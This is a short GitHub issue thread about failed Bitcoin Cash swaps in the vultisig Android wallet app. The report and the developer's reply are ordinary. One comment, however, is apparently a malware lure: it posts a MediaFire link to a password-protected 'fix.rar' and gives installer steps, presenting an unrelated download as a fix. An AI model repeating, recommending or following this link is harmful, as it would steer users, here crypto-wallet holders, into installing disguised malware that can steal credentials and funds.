### ISSUE TITLE
BUG: BCH swaps not possible

### ISSUE THREAD

**Issue by realpaaao** [vultisig/vultisig-android#837]
**Describe the bug**
When trying to swap from BCH the tx never gets broadcasted and BCH never leaves the wallet.

**Expected behavior**
Able to swap BCH

**Screenshots**
![image](https://github.com/user-attachments/assets/863198f8-73ca-460a-bf3b-4d2a09f4b1f3)

-v17

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by yevhen1sec** [comment]
I'm going to implement error screen for transaction brodcast issues
